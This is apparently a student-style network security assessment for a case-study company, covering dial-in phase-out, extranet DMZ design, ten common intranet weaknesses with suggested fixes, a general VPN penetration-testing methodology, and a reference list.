The use of modems to connect to the companys network increases the potential for intruders to use war dialers or other means to dial onto the network to access sensitive information or damage the network itself
We have decided to phase out dial in access completely. Nowadays, residential ISPs as well as most internet access in hotels has move away from dial in service and offer internet services much faster than dialup connection and to implement new hardware into the company's network to secure dial in access such as callback devices is more costly than to move all dial in access to VPN over internet.
The purpose of extranets is to reduce the costs that come from managing and exchanging information between organizations but this purpose has to be achieved without sacrificing security. There are different technologies that address security issues related to extranets, such as digital signatures, single sign-on, Smart Cards, biometrics, public key infrastructure, VPN, firewalls, intrusion detection software, etc.
Companies often use the eggshell model of defense, in which once the intruder gains access to the extranet connection it compromises the entire network. This is the reason why a defense in depth model is more appropriate for an extranet. Normally an ISO/IEC 17799 accreditation gives business partners a way to show that they follow the standard security practices, establishing and implementing an extranet security contract. This provides a sense of trust between business partners but even with security measures like this, is necessary to adhere to the saying "Trust, but verify." That a business partner abides to the best security practices available does not mean that they can become overly curious and being business partners on one front does not necessarily excludes the possibility that the same partners can be competitors in another front.
The current layout of the FTD network places the Web Server that runs IIS 5.0 on Windows 2000 in the Internal Network of the Main Office in Albany, NY. This poses the following security issues:
• Having the web server in the internal network compromises the entire internal network because since the extranet allows outside connections, if the server is compromised, it will open a door into the internal network.
• Because IIS 5.0 is part of the operating system, the operating system lifecycle applies. Windows 2000 is in extended support through 2010 but when support for the operating system ends, there will be no support for IIS 5.0 either.
• The e-commerce software is outsourced to a mom and pop company that remotely manages the web server, there is no security monitoring of their activity while they have direct access to the internal network and to information that is confidential.
• The network traffic, especially during peak hours, is extremely slow or comes to a complete halt
The security issues found in the current layout of the FTD network also includes a couple of complains from the CEO and the employees stated in the case study. The CEO is displeased with the performance of the WAN due to the network traffic issues. The Research and Development Department uses a lot of the bandwidth which has caused other employees to complain about the bandwidth at peak hours. Even thou it is not a complaint, the Research and Development Department and the Manufacturing factory have an explicit need to keep their data confidential.
In the Information Security Management Handbook, there are several points that need to be included in an extranet security policy.
• The extranet must be securely partitioned from the company intranet
• Secure network connectivity must be provided using a dedicated line or using a virtual private network
• Extranet users must be uniquely identified using adequate authentication techniques
• Authorization must adhere to the principle of least privilege
• Extranet managers will receive monthly access reports to verify the proper use of the network
• The extranet must not provide a routable path to the participant networks (i.e. the extranet provider's network should not allow packets to flow between partner networks)
• A real-time monitoring, auditing, and alerting facility must be employed to detect fraud and abuse (King, p 102).
Source: Christopher King, "Extranet Access Control Issues", Information Security Management Handbook Vol.2, 2000
A common and effective practice for securing the network when connecting an internal LAN to an external network, such as an extranet, is to install a network DMZ. The DMZ provides a tightly managed network buffer between the internal network and the external network. The DMZ can be set up by installing a firewall on the incoming external line and one at the connection to the internal network. The systems installed on the network between the two firewalls are in the network DMZ. The DMZ provides a secure partition between the extranet and the provider's Intranet.
But aside of a secured network layout, also using additional security software that can provide capabilities for intrusion detection, authentication, encryption and capabilities to audit logged activities. Upgrade the software to ensure the continued manufacturer support is vital to receive security updates to address software vulnerabilities and even provides features that provide better security. Switching IIS 5.0 to IIS 7.0 on a Windows Server 2008 gives the company a server with better security features and support from the manufacturer from the software.
INTRANET VULNERABILITY ASSESSMENT AND PENETRATION TESTING
FTD Intranet provides the company with the means to share information between its employees throughout the different departments using browser-based applications. But because the access to the intranet is restricted to users within the company it does not mean that it is any more secure than a public network like the Internet. Any network is vulnerable, even the most secure network that has measures against all known threats is still susceptible to new found exploits.
The FBI has released statistics showing that a 72% of crimes such as theft, fraud, and sabotage are caused by the company's own employees. While another 20% is attributed to external sources such as business partners and consultants who were given access to the systems and information and only 8% is caused by outsiders that had no relation to the company. The typical computer criminal is a non-technical authorized user of the system who has been around long enough to locate the control deficiencies.
When reviewing the security of an intranet besides the often targets such as information, access and content controls, the operating system and network devices must be considered also. It is often surprising to managers that intranet issues involving browser related security and access controls are caused by a specific device or a type of devices.
But also when auditing security of an intranet aside of the internal vulnerabilities, if the intranet is connected to the internet new security threats are most likely to show up.
Among these new security threats, the most common are users unintentionally allow a virus to infect the intranet and intruders gaining access to confidential company data. Wireless access also presents another series of threats that system administrators must take into account when auditing network security.
There are ten common security issues that are found in a company's intranet even thou they are not exclusive to intranets alone. And while it is hard to find all of these vulnerabilities in the same intranet, any intranet is most likely to find one of these among their vulnerabilities even if their security has been audited before.
1. Encryption
There is software that provides a secure server/client connection, which has authentication and encryption like SSL (Secure Socket Layer), Secure HTTP or even proprietary solutions. The first line of defense in intranet security should be an authenticated log on, and it should be strengthen by encrypting intranet traffic but not just username and password. These security measures should be specified in the security policy.
Suggestion: Converting all authentication and log on functions to more secure software such as Kerberos, NTLM, SSL, or equivalents.
2. Access Control
When security a network, there should be both software and hardware access controls. The access to the intranet should be limited only to internal connections and when remote access is needed it should be specified in security policies. These security policies should limit access depending on the responsibilities or job of the user, which will give specific employees or groups access only to the necessary content they need.
Suggestion: Communicating the security policy to the appropriate individuals is crucial to reinforce the idea that users should not be trying to gain access to confidential information that they are mean to access. Access controls should be in place and verified that they are working properly.
3. Passwords
The company's security policy should require users to change their password at least every 60 days and it should be different from previously used password and have a minimum level of complexity, like minimum length or characters used.
Suggestion: Enforcing this security policy with automated settings within the administrative console is relatively easy but often overlooked.
4. Content Publishing and Management
Because the intranet is meant to make the exchange of information and applications easier among company employees, someone must be responsible for making changes, like posting new or deleting WebPages from the intranet portal. Designated owners, people who can add, remove and change content in servers and WebPages should be the only ones with the required permissions to perform these functions. For some content, depending on the source or the type of content should require digital signatures; this provides extra authentication, integrity and non-repudiation.
Suggestion: Each job function should be verified and updated as necessary, it should at least specify the ownership of data and pages and permission rights.
5. Firewall Set Up
Configuring a firewall properly is an important task because having a firewall included in the network even if it is place correctly, without a proper configuration the firewall will not do the work that it's suppose to. Rushing a firewall installation and activating with default settings is a common mistaken in network security. A firewall configuration must be tested to ensure their correct operation. Software firewalls like Black Ice Defender or hardware firewalls like LuciGate have default settings that allow probes from within an intranet to identify vulnerabilities or exploits.
Suggestion: The administrator must ensure that firewalls are properly configured. Doing regular security audits will help to catch most common setup mistakes.
6. Remote Access
Dial-up access and wireless access must be handled carefully. Having any type of remote access behind the firewalls presents a vulnerability to the network and must be constantly monitored. Configuring wireless security, such as WEP or even better WPA is a necessary precaution to avoid unauthorized users gaining access to the intranet. A VPN will allow users to make a secure connection to the intranet and be able to use the resources of the Internet outside the firewall. But again if the login and password of a user is compromised then even the VPN will not be able to protect the intranet from intruders.
Suggestion: When testing the company's remote access system, ensure that the security audit analyzes and resolves all the vulnerabilities and exploits in the virtual private network.
7. Manage E-Mail
For most companies email is a crucial part of their internal communications and many professionals think that is a replacement to paper mail but it's not. An active approach to email security is very important; all authorized users must at least have knowledge of the company's email security policy and the risks of unencrypted email. Emails can be intercepted and copies of the messages often reside in multiple places, like the sender's pc, the company's mail server, the ISP mail server, the recipient's pc and possibly a mail backup server. Encrypting email is the best way to secure email communication, also tracking, monitoring and archiving messages is another way to improve email security.
Suggestion: Verify that the mail system in use supports S/MIME (Secure Multipurpose Internet Mail Extensions); this will ensure that email messages are encrypted.
8. Viruses and Rogue Code
Besides having antivirus software installed, proper configuration such as mail client monitoring, browser monitoring of WebPages with executables, and write protection are some of the considerations when configuring an antivirus correctly. Java and other executables that are embedded in WebPages or attachments opened by an application can contain rogue code that can compromise the entire network.
Suggestion: The Company's security policy must address antivirus software and configuration for the executables that are automatically launched by applications.
9. Standard Software
Security policies must address the installation and use of third party software in company's computers and enforcing these policies is just as important. Only the system administrator should be the only sources of any software that is installed in any device that is connected to the company's network. Having a standard web browser and configure security settings for that browser with the proper permissions is a basic step to improve network security. Allowing users to install third party software on a device that is connected to the network is often a source for Trojan horses, sniffers, worms, root kits and zombie code.
Suggestion: Conducting regular automated sweeps for the software on the network devices can diagnose and remove unauthorized software. Regular software maintenance should be performed by a licensed source to ensure that vulnerabilities and exploits are repaired on all servers and desktops.
10. Security Audit
There are many local, national and international firms that provide security audits for company's intranets. For example, META Security Group and AT&T offer a wide range of security audit services that include a combination of tests that are run remotely to diagnose possible vulnerabilities from external sources. Then another combination of tests from within the company's network is performed to assess any vulnerability from internal sources. The security audit often has at least three parts, the audit is performed and the results are reviewed with the company's IT employees, then the necessary fixes are applied to correct all the points found in the initial audit, and finally the audit is performed again to ensure all found vulnerabilities have been fixed. Too often companies do not make security audits a regular part of the company's security policy. The costs of security audits vary depending on the size of the network and the range of testing that is done. These tests often include trust relationships, internal categorization, roles and permissions, communication lines, and responsibilities. Having a network map that shows the physical, logical and organizational layout helps in the development of a good security policy.
Suggestion: At least an annual security audit should be performed with spot checks on a monthly basis at all the weak points of the intranet.
VIRTUAL PRIVATE NETWORK ASSESSMENT
The VPN is the best way to provide a cost effective and secure remote access for employees and interoffice communications. But a poorly configure VPN can turn into a direct access into the network for an intruder, as it bypasses security controls and outer firewalls. Some statistics show that about 90% of VPN attacks are due to poorly configured which has in turn compromised the internal network. A VPN security assessment is meant to secure the remote access against intruders that may use the VPN tunnel to access the internal network, verify that the encrypted tunnel is strengthen by an end-to-end security and to verify the security of the SSL VPN and IPSec VPN. To perform a VPN security assessment a series of external and internal tests, including a VPN vulnerability scan, an architecture review and a policy and procedure review. The first part of the security testing of a VPN is done "blind", which means that no information about the VPN is given other than the target IP address of the VPN server. This first part fingerprints the server, which allows is to find out what equipment is being used and figure out the exploits that can be used against it. After that, the VPN is tested to determine challenge and response weaknesses in the authentication process, most commonly found are username enumeration and offline key cracking. For example, if the target uses an IPSec VPN, the IKE Hash is cracked for pre-shared key using brute force attacks. Digital certificates and certification authorities have to be tested in order to avoid any information leakage vulnerabilities, such as weak encryption ciphers which will lead to an easy decryption of the VPN. If the VPN has no lock out policy, a username enumeration can compromise the VPN using a dictionary or brute force attack. After a login and password has been obtained, the testing moves to evaluate the risk of theft of credentials, through techniques like social engineering against an unaware helpdesk agent or the compromise of a stolen laptop with a cached VPN credentials. Also with the valid credentials obtained, the testing determines the access level of the user and possible privilege escalation through the network. This type of attack can be prevented by using login policies such as lockout and concurrent login attempts.
Clientless SSL VPN software that uses a web browser can expose authorized user to man in the middle attack, which was revealed in an advisory issued but the US CERT (U.S. Computer Emergency Readiness Team). "An attacker could use these devices to bypass authentication or conduct other Web-based attacks."
By using encryption in lower protocol layers, a secure connection can be made through an unsecure network like the Internet. But proper configuration like in other parts of the network is crucial to ensure security because the default VPN settings used by many manufacturers are often meant for usability instead of security.
A good secure policy will ensure that only InfoSec approved VPN clients should be used and that users of equipment that is not company owned must configure their equipment to comply with the company's VPN and network policies.
Oak Ridge National Laboratory of the Department of Energy
http://www.csm.ornl.gov/~dunigan/vpn.html
Issues in Intranet Security, Intranet Journal
http://www.intranetjournal.com/features/isecurity.shtml
Creating a secure intranet environment, Inside Knowledge
http://www.ikmagazine.com/xq/asp/txtSearch.competitive+intelligence/exactphrase.1/sid.0/articleid.32BF50E9-B620-4140-AC9E-EC514AAF18C4/qx/display.htm
Ten Intranet Security Pitfalls, Intranets
http://www.intranetstoday.com/Articles/Editorial/Features/Ten-Intranet-Security-Pitfalls--56721.aspx
Intranet Security Solution, Huawei 3COM
http://www.smartinfo.com.hk/huawei-3com/june2005china/solutions.pdf
Hacking Intranet Websites From The Outside, White Hat Security
http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Grossman.pdf
Internet and Intranet Security, IT Services Division, Department of Administration, State of Montana
http://itsd.mt.gov/content/policy/policies/Legacy_Policy/Statewide_Policy_Internet_and_Intranet_Security.pdf
Intranet vulnerabilities can weaken the best defense, Toolbox.com
http://it.toolbox.com/blogs/adventuresinsecurity/intranet-vulnerabilities-can-weaken-even-the-best-defense-18094
Handbook of Information Security Management, Micki Krause, Harold F. Tipton
http://www.cccure.org/Documents/HISM/ewtoc.html
Dial In Testing, Penetration Testing Group, Portcullis Computer Security Ltd
http://www.penetration-testing-group.co.uk/dial.htm
Dial In or RAS Security Testing, Foreground Security
http://www.foregroundsecurity.com/services/security-audit-and-testing/dial-in-or-ras-security-testing
Alphabetical List of vulnerability Assessment Products
http://www.timberlinetechnologies.com/products/vulnerability.html
Security Considerations for Extranets
http://www.sans.org/reading_room/whitepapers/basics/security-considerations-extranets_527
Extranets: The weakest Link & Security
http://www.sans.org/reading_room/whitepapers/basics/extranets-weakest-link-security_432
Who do you distrust and how much does it cost?
http://extranet.isnie.org/uploads/isnie2008/weber_mcevily_radzevick.pdf
Vulnerability scanners
http://www.cotse.com/tools/vuln.htm
Extranet/Intranet Cracker - Dictionary Attack
http://www.nezperce.com/~joe/matt/program/vb/Tutorials/Extranet_Intranet_Cracker/index.html
Internet, Intranet, and Extranet Security
http://fse.tibiscus.ro/anale/Lucrari2009/082.%20Munteanu.pdf
Optimal Extranet Security: A Methodology. Steve Hunt. Giga Information Group
